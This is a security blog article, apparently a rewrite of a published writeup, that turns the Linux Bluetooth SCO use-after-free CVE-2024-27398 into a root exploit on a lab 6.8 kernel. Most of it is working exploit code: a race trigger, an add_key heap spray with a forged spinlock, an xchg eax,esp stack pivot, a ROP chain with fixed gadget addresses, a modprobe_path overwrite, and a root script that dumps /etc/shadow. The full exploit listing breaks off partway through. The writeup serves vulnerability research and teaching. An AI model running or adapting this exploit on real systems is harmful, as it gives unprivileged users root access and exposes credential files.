Source attribution. This is an original English rewrite of “CVE-2024-27398 — Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass”, published on Secunnix Cyber Security on 2026-04-25 (author not clearly listed — byline reads “Yayıncı: Anonymous”). The original carries an “All rights reserved” notice (© Secunnix Cyber Security — Tüm hakları saklıdır.), so this is a paraphrased English rewrite, not a verbatim translation. All figures, code samples, and the POC animation are reproduced from the original at their original positions, with credit. Vulnerability research credited to the upstream PoC author sty886; the original article also credits lkmidas for the modprobe_path root technique.

Executive Summary
CVE-2024-27398 is a race-induced use-after-free in the Linux kernel’s Bluetooth SCO (Synchronous Connection-Oriented link) subsystem, fixed in Linux 6.8.2+. Two concurrent connect() calls on the same SCO socket can be raced into creating two sco_conn objects with two independent delayed_work timers; close() cancels only the timer attached to the surviving connection, leaving the orphaned timer pending against an sk that gets freed. About two seconds later the orphaned timer fires inside sco_sock_timeout(), takes sk->sk_lock, writes sk->sk_err, and invokes sk->sk_state_change(sk), a function pointer that the attacker controls by then.
The Secunnix walkthrough chains the bug into a clean local privilege escalation on a tuned 6.8.0 lab kernel. Heap spray is done with add_key(2): user_key_payload headers are 24 bytes, so a 980-byte payload lands in kmalloc-1024, the same merged cache the freed sco_pinfo came from. The spray forges a valid-looking DEBUG_SPINLOCK at payload offset 0x80 (so do_raw_spin_lock’s magic check passes) and overwrites the sk_state_change function pointer with the address of an xchg eax, esp ; ret gadget in kernel text. When the timer fires, the swap pivots the kernel stack into a userspace page mapped at 0x81011000, and a pure-ROP chain calls memcpy(modprobe_path, "/tmp/x", 7). Executing an invalid-magic binary triggers call_usermodehelper, which runs the attacker’s script as root. SMEP is bypassed because no userspace code is executed: every instruction runs from .text. SMAP is disabled in the lab so the kernel can read the userspace ROP chain. The article walks through the bug, the lab, the structure layout, the spray, the gadget, the chain, the patch, and provides the full annotated POC.
Introduction
The original author opens by saying they stumbled across a minimal PoC for CVE-2024-27398 in sty886/sco-race-condition — just enough code to trigger the race — and decided to take it the rest of the way: heap-spray to reclaim the freed slot, forge the spinlock pattern, build a pivot, and turn it into root. All screenshots in this post are captured live from real QEMU/KVM runs against a custom Linux 6.8 lab kernel. The intended reader is comfortable with the SLUB allocator, can read C and x86-64 assembly fluently, and wants to see why every choice was made, not just what was done.
1. The Vulnerability
1.1 Vulnerable code
The bug lives in sco_sock_timeout() in net/bluetooth/sco.c, scheduled as delayed_work on the system workqueue whenever an SCO connection attempt is allowed to time out. The handler takes the per-socket spinlock, sets an error, and invokes the socket’s state-change callback:
static void sco_sock_timeout(struct work_struct *work)
{
    struct sco_conn *conn = container_of(work, struct sco_conn,
                                         timeout_work.work);
    struct sock *sk;

    sk = conn->sk;
    if (!sk)
        return;

    bh_lock_sock(sk);           /* [1] acquires sk->sk_lock.slock */
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);    /* [2] function pointer call */
    bh_unlock_sock(sk);
    sock_put(sk);               /* [3] drops refcount */
}
If sk has been freed and its slot reclaimed by an attacker-controlled allocation by the time the timer fires, sk->sk_state_change is whatever the attacker wrote — arbitrary kernel-mode RIP control.
1.2 The race condition
Two concurrent connect() calls on the same SCO socket can each create their own sco_conn and schedule their own timer. The trimmed-down diff that summarises where the locking went wrong:
sco_connect() inside sco_sock_connect():
- lock_sock(sk); /* was here: serialized connect attempts */
err = sco_chan_add(conn, sk, NULL);
if (sk->sk_state == BT_CONNECTED)
sco_sock_set_timer(sk, sk->sk_sndtimeo);
- release_sock(sk);
And in sco_sock_connect() itself:
+ lock_sock(sk);
if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+ release_sock(sk);
return -EBADFD;
}
- lock_sock(sk);
bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
- release_sock(sk);
err = sco_connect(sk);
- lock_sock(sk);
err = bt_sock_wait_state(...);
1.3 Race timeline
Two threads call connect() simultaneously with two different destination addresses. Both create a sco_conn and arm a 2-second timer. The last write to sco_pi(sk)->conn wins. When the userspace caller closes the socket, only that surviving connection’s timer is cancelled; the other timer keeps pointing at conn->sk, which is freed almost immediately. Two seconds later, the orphaned timer’s callback executes against memory the attacker now controls.
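The outcome of the timeline above can be reproduced with a toy, single-threaded model. This is only a sketch: the toy_* types and functions are hypothetical stand-ins invented for illustration, not kernel structures, and the two "threads" simply run one after the other to show the last-write-wins effect.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-ins for the kernel objects; not the real kernel structures. */
struct toy_sock;

struct toy_conn {
    struct toy_sock *sk;   /* back-pointer used by the timeout handler */
    bool timer_pending;    /* models the armed delayed_work */
};

struct toy_sock {
    struct toy_conn *conn; /* models sco_pi(sk)->conn, a single slot */
    bool freed;
};

/* Each racing connect() attaches its own conn and arms its own timer. */
void toy_connect(struct toy_sock *sk, struct toy_conn *conn)
{
    assert(sk != NULL && conn != NULL);
    conn->sk = sk;
    conn->timer_pending = true;
    sk->conn = conn;       /* last writer wins; the earlier conn is forgotten */
}

/* close() can only cancel the timer it can still reach through sk->conn. */
void toy_close(struct toy_sock *sk)
{
    assert(sk != NULL);
    if (sk->conn)
        sk->conn->timer_pending = false;
    sk->freed = true;
}

/* Returns how many timers are still armed against a freed socket. */
int toy_orphan_timers(void)
{
    struct toy_sock sk = { .conn = NULL, .freed = false };
    struct toy_conn a = { 0 }, b = { 0 };
    int orphans = 0;

    toy_connect(&sk, &a);  /* thread 1 */
    toy_connect(&sk, &b);  /* thread 2 overwrites sk.conn */
    toy_close(&sk);

    if (a.timer_pending && a.sk->freed) orphans++;
    if (b.timer_pending && b.sk->freed) orphans++;
    return orphans;
}
```

Calling toy_orphan_timers() yields one orphan: the first connection's timer stays armed because nothing reachable from the socket points at it any more.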
1.4 The official patch
Linux 6.8.2 fixed this with three coordinated changes: (1) a sco_conn_lock mutex to serialise access; (2) sock_hold(sk) before the timer is scheduled and sock_put(sk) at the end of sco_sock_timeout(), so the socket can’t be freed underneath the timer; (3) replacing async cancel_delayed_work() with cancel_delayed_work_sync() so teardown waits for any already-running timer handler to finish.
2. Lab Setup
2.1 Kernel configuration
The lab uses a custom Linux 6.8 build with a few deliberate choices. Bluetooth is compiled in (CONFIG_BT=y, CONFIG_BT_BREDR=y, CONFIG_BT_HCIVHCI=y for /dev/vhci). SLUB is enabled with CONFIG_SLAB_MERGE_DEFAULT=y. Crucially, CONFIG_KASAN=n and CONFIG_MEMCG_KMEM=n: with either of those enabled, the SCO cache wouldn’t merge into the generic kmalloc-1024 and the add_key spray would never reach the freed slot. CONFIG_DEBUG_SPINLOCK=y widens the race window and grows sco_pinfo to 984 bytes, which SLUB serves from the 1024-byte size class. CONFIG_LOCKDEP=n stops the lock validator from tripping on the synthetic spinlock that lives inside the spray payload.
2.2 QEMU launch parameters
qemu-system-x86_64 \
    -m 4096 \
    -smp 2 \
    -cpu host,+smep,-smap \
    -enable-kvm \
    -kernel linux-6.8/arch/x86/boot/bzImage \
    -initrd exploit.cpio.gz \
    -append "console=ttyS0 nokaslr loglevel=7 panic_on_oops=0 hung_task_timeout_secs=0 lockdep=off" \
    -nographic \
    -no-reboot
| Parameter | Reason |
|---|---|
| -cpu host,+smep,-smap | SMEP on (forces pure ROP); SMAP off (kernel reads userspace pivot page) |
| nokaslr | All kernel addresses fixed, so no info leak is needed |
| panic_on_oops=0 | Kernel oops at RIP=0x0 does not kill the machine, so the exploit continues |
| lockdep=off | Lock validator would trip on the fake-but-valid spinlock spray data |
| -smp 2 | Two CPUs required for the race to be meaningful |
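Before relying on the -cpu setting, it can help to confirm what the guest actually reports. The sketch below is an illustration only: has_cpu_flag is a hypothetical helper, and it assumes the caller has already read the "flags" line of /proc/cpuinfo into a string.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Returns true when `flag` appears as a whole whitespace-separated token in
 * `flags_line` (for example the "flags" line of /proc/cpuinfo). */
bool has_cpu_flag(const char *flags_line, const char *flag)
{
    size_t flen;
    const char *p;

    assert(flags_line != NULL && flag != NULL);
    flen = strlen(flag);
    p = flags_line;
    if (flen == 0)
        return false;

    while ((p = strstr(p, flag)) != NULL) {
        bool starts_token = (p == flags_line) || p[-1] == ' ' || p[-1] == '\t';
        char end = p[flen];
        bool ends_token = end == '\0' || end == ' ' || end == '\n' || end == '\t';

        if (starts_token && ends_token)
            return true;
        p += 1;            /* keep scanning past a partial match */
    }
    return false;
}
```

In the lab described here, the expectation would be that "smep" is present and "smap" is absent inside the guest.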
3. Target Structure Analysis
3.1 struct sco_pinfo layout
struct sco_pinfo {
struct sock sk; /* must be first — pointer cast magic */
bdaddr_t src;
bdaddr_t dst;
__u32 flags;
__u16 setting;
__u8 cmsg_mask;
struct bt_codec codec;
struct sco_conn *conn;
};
With CONFIG_DEBUG_SPINLOCK=y, spinlock_t expands from 4 bytes to 24 bytes (adding magic, owner_cpu, owner for debugging). That inflates struct sock and pushes sco_pinfo to 984 bytes — SLUB rounds it to kmalloc-1024.
3.2 Critical offsets in struct sock
$ pahole -C sco_pinfo vmlinux
struct sco_pinfo {
struct sock sk; /* 0 904 */
... /* 904 80 */
/* size: 984, cachelines: 16, members: 7 */
};
$ pahole -C sock vmlinux | grep -E "sk_lock|sk_state_change"
socket_lock_t sk_lock; /* 152 72 */
void (*sk_state_change)(struct sock *); /* 824 8 */
So sk_lock sits at offset 0x98 (152) and sk_state_change at 0x338 (824).
3.3 socket_lock_t internals (DEBUG_SPINLOCK=y)
socket_lock_t (72 bytes total):
+0x00 spinlock_t slock (24 bytes):
+0x00 raw_lock.val (4B) ← 0 = unlocked
+0x04 magic (4B) ← MUST be 0xdead4ead
+0x08 owner_cpu (4B) ← -1 = unowned
+0x0C pad (4B)
+0x10 owner (8B) ← (void*)-1 = unowned
+0x18 owned (4B)
+0x1C pad (4B)
+0x20 wq (wait_queue_head_t) (40B)
The magic field is checked by do_raw_spin_lock() on every acquisition. If it doesn’t equal 0xdead4ead, the kernel warns and may panic. The spray has to forge this faithfully or the chain dies before reaching sk_state_change.
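The 24-byte layout listed above can be mirrored in userspace to double-check the offsets. This is a sketch under stated assumptions: struct toy_debug_spinlock and toy_lock_looks_idle are hypothetical names, the field order is copied from the listing rather than from kernel headers, and the helper only compares fields against the values in the listing. It does not reproduce the kernel's own checks in do_raw_spin_lock().

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_SPINLOCK_MAGIC 0xdead4eadu

/* Userspace mirror of the debug spinlock layout listed above.
 * Field names follow the listing; this is not the kernel's definition. */
struct toy_debug_spinlock {
    uint32_t raw_lock;   /* +0x00: 0 means unlocked */
    uint32_t magic;      /* +0x04: expected to equal 0xdead4ead */
    uint32_t owner_cpu;  /* +0x08: 0xffffffff (-1) means unowned */
    uint32_t pad;        /* +0x0c */
    uint64_t owner;      /* +0x10: all-ones ((void *)-1) means unowned */
};

_Static_assert(sizeof(struct toy_debug_spinlock) == 24, "expected 24 bytes");
_Static_assert(offsetof(struct toy_debug_spinlock, magic) == 0x04, "magic offset");
_Static_assert(offsetof(struct toy_debug_spinlock, owner) == 0x10, "owner offset");

/* Returns 1 when the fields match the idle values from the listing. */
int toy_lock_looks_idle(const struct toy_debug_spinlock *l)
{
    assert(l != NULL);
    return l->raw_lock == 0 &&
           l->magic == TOY_SPINLOCK_MAGIC &&
           l->owner_cpu == UINT32_MAX &&
           l->owner == UINT64_MAX;
}
```

The static assertions fail at compile time if the mirrored struct ever drifts from the 24-byte layout, which is the main point of the exercise.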
4. Exploit Stage 1: Triggering the UAF
4.1 Virtual HCI setup
No real Bluetooth hardware is needed. /dev/vhci exposes a virtual HCI controller; the exploit just has to answer the HCI command stream the kernel issues during stack init:
/* Open virtual HCI device */
vfd = open("/dev/vhci", O_RDWR);
/* Initialize as BR/EDR controller */
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);
/* Start HCI command response thread */
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);
/* Bring up the hci0 interface */
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(hfd, HCIDEVUP, 0); /* _IOW(0x48, 201, int) */
close(hfd);
sleep(4); /* wait for HCI initialization sequence to complete */
printf("[*] HCI ready\n");
The vHCI thread answers HCI_Create_Connection by forging a Connection-Complete event with handle = 1, so the kernel state machine moves forward without ever talking to a real radio:
case 0x0401: { /* HCI_Create_Connection */
uint8_t ev[20] = {0};
ev[0] = 4; /* HCI_EVENT_PKT */
ev[1] = 0x03; /* HCI_EV_CONN_COMPLETE */
ev[2] = 11; /* parameter length */
ev[3] = 0; /* status = success */
ev[4] = 0x01; ev[5] = 0x00; /* handle = 1 */
memcpy(&ev[6], &buf[4], 6); /* copy BD_ADDR from command */
ev[12] = 0x01; ev[13] = 0x00; /* link type = ACL, enc = off */
write(vfd, ev, 14);
break;
}

xchg eax, esp gadget at 0xffffffff81011cf1 is selected as the stack pivot, two userspace pages are mapped. Source: original article.
/dev/vhci. Source: original article.
4.2 Race trigger per iteration
Per race attempt: open an SCO socket, set a 2-second send timeout, spin up two threads that connect() simultaneously to two different destination addresses (one all-zeros, one all-ones), join, close, then spray:
for (int batch = 0; batch < 100; batch++) {
/* 2000 race attempts + 2000 add_key calls per batch */
for (int i = 0; i < BATCH_SZ; i++) {
/* [1] Trigger race → create orphan timer → free sk */
g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK, BTPROTO_SCO);
setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
pthread_barrier_init(&g_bar, NULL, 2);
pthread_create(&t1, NULL, c1, NULL);
pthread_create(&t2, NULL, c2, NULL);
pthread_join(t1, NULL); pthread_join(t2, NULL);
pthread_barrier_destroy(&g_bar);
close(g_fd); /* ← sk freed here */
/* [2] Spray — try to land in the freed slot */
char desc[32];
snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd), KEY_SPEC_SESSION_KEYRING);
}
/* [3] Wait for orphan timers to fire */
printf("[*] Waiting 3s...\n");
sleep(3);
/* [4] Trigger modprobe if modprobe_path was overwritten */
for (int t = 0; t < 5; t++) {
system("/tmp/dummy 2>/dev/null; true");
usleep(500000);
if (access("/tmp/pwn", F_OK) == 0) goto win;
}
}

connect() calls. Source: original article.
SO_SNDTIMEO=2s timer to fire against freed memory. Source: original article.
5. Exploit Stage 2: Heap Spray via add_key
5.1 Why add_key?
The add_key(2) syscall with key type "user" allocates a user_key_payload (24-byte header) plus the caller’s payload. With datalen = 980 the total allocation is 1004 bytes — rounded up to kmalloc-1024, the same merged cache the freed sco_pinfo lives in (when KASAN/MEMCG are off).
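The size arithmetic above can be checked with a simplified model of the kmalloc size classes. This is a sketch, not the allocator's logic: toy_kmalloc_class is a hypothetical helper that rounds up to the next power of two and deliberately ignores the 96-byte and 192-byte caches, which do not matter for sizes near 1 KiB.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified model: round up to the next power-of-two size class.
 * Real SLUB also has 96- and 192-byte caches, which are ignored here. */
size_t toy_kmalloc_class(size_t size)
{
    size_t cls = 8;

    assert(size > 0 && size <= 8192);
    while (cls < size)
        cls <<= 1;
    return cls;
}
```

Under this model, the 24-byte header plus 980 bytes of data (1004 bytes) and the 984-byte sco_pinfo both map to the 1024-byte class.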
5.2 Spray payload layout
Allocation layout (1024 bytes total):
┌──────────────────────────────────────────────────────┐
│ user_key_payload header (24 bytes) │
│ +0x00 rcu_head (16B) │ datalen (2B) │ pad (6B) │
├──────────────────────────────────────────────────────┤ ← payload_data[0]
│ [maps to sk+0x18] │
│ ... │
│ [maps to sk+0x98 = sk_lock.slock] │
│ payload_data[0x80] raw_lock = 0x00000000 │ ← unlocked
│ payload_data[0x84] magic = 0xdead4ead │ ← REQUIRED
│ payload_data[0x88] owner_cpu = 0xffffffff │ ← -1 (unowned)
│ payload_data[0x8c] pad = 0x00000000 │
│ payload_data[0x90] owner = 0xffffffffffffffff│ ← (void*)-1
│ ... │
│ [maps to sk+0x338 = sk_state_change] │
│ payload_data[0x320] = 0xffffffff81011cf1 │ ← our gadget
└──────────────────────────────────────────────────────┘
static char g_kd[980];
static void build_spray(void) {
memset(g_kd, 0, sizeof(g_kd));
int h = 24; /* user_key_payload header size */
/* sk+0x98: valid unlocked DEBUG_SPINLOCK */
int slock = SK_LOCK_OFF - h; /* 0x98 - 0x18 = 0x80 */
*(uint32_t*)(g_kd + slock + 0) = 0; /* raw_lock = unlocked */
*(uint32_t*)(g_kd + slock + 4) = 0xdead4ead; /* magic — checked by kernel */
*(uint32_t*)(g_kd + slock + 8) = 0xffffffff; /* owner_cpu = -1 */
*(uint32_t*)(g_kd + slock + 12) = 0;
*(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */
/* sk+0x338: overwrite sk_state_change with our pivot gadget */
*(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
/* SK_STCHG_OFF=0x338, h=0x18, so payload_data[0x320] = gadget addr */
}
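The offset translation used in the listing above is a single subtraction, shown here in isolation. This is an illustrative sketch: toy_payload_index and TOY_KEY_HEADER are hypothetical names, and the 24-byte header size is the figure quoted in this article.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_KEY_HEADER 24u  /* user_key_payload header size quoted above */

/* Translate an offset inside the freed object into an index into the
 * key payload buffer, which starts right after the 24-byte header. */
size_t toy_payload_index(size_t object_offset)
{
    assert(object_offset >= TOY_KEY_HEADER);
    return object_offset - TOY_KEY_HEADER;
}
```

One consequence of the subtraction is that the first 24 bytes of the reclaimed object overlap the key header and are not under the payload's control, which is why the assertion rejects smaller offsets.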
5.3 The spray loop
100 batches × 2000 iterations. Each iteration triggers the race, closes the socket, sprays once with add_key. Between batches, sleep 3 s so the SO_SNDTIMEO=2s timers can fire, then up to five attempts to launch /tmp/dummy — if modprobe_path was overwritten, the kernel will dispatch the attacker’s script and /tmp/pwn will appear.
6. Exploit Stage 3: UAF Fires — KASAN Detection
On a KASAN-enabled build, the UAF is loud: when the orphan timer runs, do_raw_spin_lock reads the freed spinlock’s magic field and KASAN catches the access. The workqueue context (sco_sock_timeout) is explicitly labelled in the report. On the exploitation kernel (KASAN off), the same access is silent: the spray has forged 0xdead4ead, the magic check passes, the lock is “taken”, and execution carries on to the function pointer call.

BUG: KASAN: slab-use-after-free in do_raw_spin_lock — the orphan timer dereferences a freed sk. Source: original article.
sco_sock_timeout workqueue context. Source: original article.
7. Exploit Stage 4: SMEP Bypass via xchg eax, esp
7.1 Why we can’t jump to shellcode
SMEP (Supervisor Mode Execution Prevention) faults if the kernel’s RIP ever lands on a userspace address. A naive callback-to-userspace-shellcode primitive cannot work. ROP solves it: every instruction executes from kernel .text; ROP just reads chain data from userspace memory, which SMEP is fine with (SMAP would object, but SMAP is off here).
7.2 The xchg eax, esp ; ret gadget
Two bytes, 94 c3, appear at 0xffffffff81011cf1. When the kernel jumps there via sk_state_change(sk), RAX is the gadget’s own address. The instruction swaps the low 32 bits of RAX and RSP; because a 32-bit register write on x86-64 clears the upper 32 bits of the destination, RSP becomes 0x0000000081011cf1, a userspace address. The subsequent ret reads the first ROP gadget from that userspace page.
7.3 Mapping the pivot page
Two consecutive userspace pages at 0x81011000–0x81012fff are mmap’d with MAP_FIXED to hold the chain. SMEP doesn’t prevent the kernel from reading them; SMAP is off, so it doesn’t prevent that either.
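The two addresses in this section follow from plain bit arithmetic, which the sketch below spells out. The helper names are hypothetical and the code only models the register math described above; it does not touch any kernel state.

```c
#include <assert.h>
#include <stdint.h>

/* Value the stack pointer holds after a 32-bit write of the low half of
 * `rax`: the upper 32 bits are cleared, as with any 32-bit register write
 * on x86-64. */
uint64_t toy_pivot_target(uint64_t rax)
{
    return rax & 0xffffffffu;
}

/* Base of the page that contains `addr`; `page_size` must be a power of two. */
uint64_t toy_page_base(uint64_t addr, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return addr & ~(page_size - 1);
}
```

With the gadget address from this article, the first helper gives 0x81011cf1 and the second gives the page base 0x81011000 quoted above.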
7.4 Building the ROP chain
/* Kernel #23 (6.8.0, no KASAN, nokaslr) gadget addresses */
#define POP_RDI_RET 0xffffffff8104c1adUL /* pop rdi; ret */
#define POP_RSI_RET 0xffffffff811bb9beUL /* pop rsi; ret */
#define POP_RDX_RET 0xffffffff810bc1b2UL /* pop rdx; ret */
#define MEMCPY_ADDR 0xffffffff82905e70UL /* kernel memcpy */
#define MODPROBE_PATH 0xffffffff8356a020UL /* modprobe_path symbol */
#define STRING_PAGE 0xdead0000UL /* userspace: "/tmp/x" */
uint64_t *rop = (uint64_t*)(PIVOT_ADDR); /* 0x81011cf1 */
rop[0] = POP_RDI_RET; /* pop rdi; ret */
rop[1] = MODPROBE_PATH; /* rdi = &modprobe_path */
rop[2] = POP_RSI_RET; /* pop rsi; ret */
rop[3] = STRING_PAGE; /* rsi = 0xdead0000 ("/tmp/x") */
rop[4] = POP_RDX_RET; /* pop rdx; ret */
rop[5] = 7; /* rdx = 7 */
rop[6] = MEMCPY_ADDR; /* memcpy(dst, src, len) */
rop[7] = XCHG_EAX_ESP + 1; /* 0xffffffff81011cf2: just 'ret' */
/* cascade into zeroed memory → RIP=0 → oops */
0x81011000 [page boundary]
...
0x81011cf1 rop[0] = 0xffffffff8104c1ad pop rdi; ret
0x81011cf9 rop[1] = 0xffffffff8356a020 modprobe_path
0x81011d01 rop[2] = 0xffffffff811bb9be pop rsi; ret
0x81011d09 rop[3] = 0x00000000dead0000 STRING_PAGE
0x81011d11 rop[4] = 0xffffffff810bc1b2 pop rdx; ret
0x81011d19 rop[5] = 0x0000000000000007 length = 7
0x81011d21 rop[6] = 0xffffffff82905e70 memcpy
0x81011d29 rop[7] = 0xffffffff81011cf2 trailing ret
0x81011d31 0x0000000000000000 ← crash here (RIP=0)
...
0x81013000 [page boundary]
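The slot addresses in the table above are the base address plus eight bytes per entry, which is easy to verify. toy_slot_addr is a hypothetical helper written only to check the table.

```c
#include <assert.h>
#include <stdint.h>

/* Address of the i-th 8-byte chain slot when slot 0 sits at `base`. */
uint64_t toy_slot_addr(uint64_t base, unsigned int i)
{
    assert(i < 512);
    return base + 8ull * i;
}
```

Slot 8 lands at 0x81011d31, the zeroed entry marked as the crash point, and one slot further gives 0x81011d39. Note that the slots are not 8-byte aligned, which x86-64 tolerates for ordinary stack loads.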
8. Exploit Stage 5: RIP Control and Kernel Oops
The sequence at firing time:
- bh_lock_sock(sk) reads the forged magic = 0xdead4ead, the magic check passes, “lock acquired”.
- sk->sk_err = ETIMEDOUT is a harmless write.
- sk->sk_state_change(sk) jumps to our xchg eax, esp ; ret gadget.
- xchg swaps the low 32 bits of RAX and RSP, redirecting the kernel stack into userspace.
- ret loads the first ROP gadget address from 0x81011cf1.
- The three pop reg ; ret gadgets stage RDI, RSI, RDX.
- memcpy(modprobe_path, "/tmp/x", 7) runs in kernel context.
- Trailing rets cascade into zeroed memory until RIP = 0x0 and the kernel oopses. Because panic_on_oops=0, the machine survives, and the offending task is killed.

RIP=0x0000000000000000 after the ROP chain’s trailing ret sled drops into zeroed memory. Source: original article.
RSP=0x0000000081011d39 after the xchg eax, esp pivots the kernel stack into userspace where the ROP chain lives. Source: original article.
memcpy() returns; RAX holds modprobe_path, proof the chain ran inside the kernel. Source: original article.
9. Exploit Stage 6: Root via modprobe_path
9.1 How modprobe_path gives us root
When the kernel encounters an unrecognised binary format (the canonical trigger: an executable whose first 4 bytes don’t match any registered handler), it calls request_module("binfmt-XXXX"), which internally invokes call_usermodehelper(modprobe_path, ...) as root, bypassing all userspace privilege checks. modprobe_path normally points to /sbin/modprobe. Overwriting it to /tmp/x means the kernel runs the attacker’s shell script as uid=0.
9.2 The root script
FILE *f = fopen("/tmp/x", "w");
fprintf(f,
    "#!/bin/sh\n"
    "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
    "uname -a >> /tmp/pwn\n"
    "id >> /tmp/pwn\n"
    "echo '--- /etc/shadow ---' >> /tmp/pwn\n"
    "cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
    "echo '--- ROOTED ---' >> /tmp/pwn\n");
fclose(f);
chmod("/tmp/x", 0755);
int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
write(d, "\xff\xff\xff\xff", 4); /* invalid ELF magic */
close(d);
9.3 Triggering and confirming root
After each 3-second wait, the exploit invokes /tmp/dummy up to five times. The kernel sees an unrecognised binary format and calls request_module(), which calls call_usermodehelper("/tmp/x", ...) as root; that runs the script, which writes the uid=0 banner into /tmp/pwn. The exploit then calls access("/tmp/pwn", F_OK); if the file exists, root was achieved.
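From the defender's side, the same mechanism suggests a simple check: the current helper path is exposed through the /proc/sys/kernel/modprobe sysctl file, so a changed value is observable. The sketch below is not part of the original article; the toy_* helpers are hypothetical, and the expected value /sbin/modprobe is the default named in section 9.1 and may differ per distribution.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Remove one trailing newline in place, if present. */
void toy_strip_newline(char *s)
{
    size_t n;

    assert(s != NULL);
    n = strlen(s);
    if (n > 0 && s[n - 1] == '\n')
        s[n - 1] = '\0';
}

/* Read the kernel's current modprobe helper path into `out`.
 * Returns 0 on success, -1 if the sysctl file cannot be read. */
int toy_read_modprobe_path(char *out, size_t len)
{
    FILE *f;

    assert(out != NULL && len > 0);
    f = fopen("/proc/sys/kernel/modprobe", "r");
    if (!f)
        return -1;
    if (!fgets(out, (int)len, f)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    toy_strip_newline(out);
    return 0;
}

/* Returns 1 when `path` differs from the expected helper location. */
int toy_modprobe_path_changed(const char *path, const char *expected)
{
    assert(path != NULL && expected != NULL);
    return strcmp(path, expected) != 0;
}
```

A monitoring job could call toy_read_modprobe_path() periodically and alert when toy_modprobe_path_changed() reports a value such as /tmp/x.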

[!!!] ROOT! (SMEP BYPASS); /tmp/pwn contains the banner written by the script the kernel just ran on our behalf. Source: original article.
10. Full Exploit Source

The complete annotated C source, reproduced verbatim from the original article:
/*
* CVE-2024-27398 LPE — SMEP BYPASS via xchg eax,esp pivot + pure ROP
*
* Vulnerability: Use-After-Free in sco_sock_timeout() via race in
* sco_sock_connect()/sco_connect() — missing lock_sock serialization.
*
* Technique:
* sk_state_change = xchg_eax_esp_ret (0xffffffff81011cf1)
* xchg eax, esp → RSP = 0x81011cf1 (mmap'd userspace page)
* ROP: pop rdi/rsi/rdx → memcpy(modprobe_path, "/tmp/x", 7)
* All gadgets in kernel .text → SMEP bypassed
* SMAP must be off (nosmap) → kernel reads userspace ROP data
*
* Target: Linux 6.8.0 #23, CONFIG_KASAN=n, CONFIG_MEMCG_KMEM=n,
* CONFIG_DEBUG_SPINLOCK=y, nokaslr, SMEP on, SMAP off
*/
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdint.h>
#include <poll.h>
/* ── Kernel symbol and gadget addresses (6.8.0 #23, nokaslr) ───────────── */
#define XCHG_EAX_ESP 0xffffffff81011cf1UL /* 94 c3: xchg eax,esp; ret */
#define PIVOT_ADDR (XCHG_EAX_ESP & 0xFFFFFFFF) /* → 0x81011cf1 */
#define POP_RDI_RET 0xffffffff8104c1adUL /* 5f c3: pop rdi; ret */
#define POP_RSI_RET 0xffffffff811bb9beUL /* 5e c3: pop rsi; ret */
#define POP_RDX_RET 0xffffffff810bc1b2UL /* 5a c3: pop rdx; ret */
#define MEMCPY_ADDR 0xffffffff82905e70UL /* kernel memcpy() */
#define MODPROBE_PATH 0xffffffff8356a020UL /* char modprobe_path[256] */
#define STRING_PAGE 0xdead0000UL /* userspace page: "/tmp/x" */
/* ── struct sock field offsets ──────────────────────────────────────── */
#define SK_LOCK_OFF 0x98 /* socket_lock_t sk_lock (pahole verified) */
#define SK_STCHG_OFF 0x338 /* sk_state_change fptr (pahole verified) */
#define PG 4096
#define BTPROTO_HCI 1
#define BTPROTO_SCO 2
#define BATCH_SZ 2000
typedef struct { uint8_t b[6]; } __attribute__((packed)) bdaddr_t;
struct sockaddr_sco { sa_family_t f; bdaddr_t a; uint16_t t; };
/* ── vHCI state ─────────────────────────────────────────────────────── */
static int vfd;
static volatile int vstop = 0;
/* Respond to HCI commands issued by the kernel during BT stack init */
static void *vhci_thread(void *a) {
uint8_t buf[512], resp[300], extra[248];
struct pollfd pf = {.fd = vfd, .events = POLLIN};
while (!vstop) {
if (poll(&pf, 1, 100) <= 0) continue;
int n = read(vfd, buf, sizeof(buf));
if (n < 4 || buf[0] != 1) continue; /* must be HCI_COMMAND_PKT */
memset(extra, 0, sizeof(extra));
int el = 248;
uint16_t op = buf[1] | (buf[2] << 8);
switch (op) {
case 0x1001: extra[0]=11; extra[3]=11; extra[4]=10; break;
case 0x1009: extra[0]=0xAA; extra[1]=0xBB; extra[2]=0xCC;
extra[3]=0xDD; extra[4]=0xEE; extra[5]=0xFF; break;
case 0x1002: memset(extra, 0xff, 64); break;
case 0x1003: extra[0]=0xff; extra[1]=0xff; extra[2]=0x8f;
extra[3]=0xfe; extra[4]=0xdb; extra[5]=0xff;
extra[6]=0x5b; extra[7]=0x87; break;
case 0x1004: case 0x1005:
extra[0] = n > 4 ? buf[4] : 0;
extra[1] = 1; memset(&extra[2], 0xff, 8); break;
case 0x100b: extra[0]=0xff; extra[1]=0x03; extra[2]=0xff;
extra[3]=0x0a; extra[5]=0x08; break;
case 0x0c14: memcpy(extra, "vhci", 4); break;
